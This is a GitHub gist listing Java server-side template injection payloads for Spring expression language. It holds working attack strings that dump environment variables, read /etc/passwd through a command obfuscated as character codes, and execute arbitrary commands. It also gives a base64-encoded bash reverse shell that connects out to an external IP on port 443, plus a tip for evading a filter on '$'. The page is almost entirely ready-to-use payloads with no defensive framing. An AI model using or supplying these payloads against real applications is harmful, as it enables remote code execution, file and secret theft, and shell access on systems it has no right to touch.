Skip to content

Instantly share code, notes, and snippets.

@kavishkagihan

kavishkagihan/java-ssti.md

Last active January 14, 2024 18:18
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save kavishkagihan/259ff65726ec8cb86867e8ecb79f5341 to your computer and use it in GitHub Desktop.
Save kavishkagihan/259ff65726ec8cb86867e8ecb79f5341 to your computer and use it in GitHub Desktop.
Download ZIP
Java ssti payloads to read remote files and get RCE
Raw
java-ssti.md

  • Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.

  • Get env vars

*{T(java.lang.System).getenv()}
  • Read files (/etc/passwd)
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
  • Execute comamnds
*{T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
  • Get a shell (base64 encoded reverse shell)
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDEvNDQzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream()).next()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment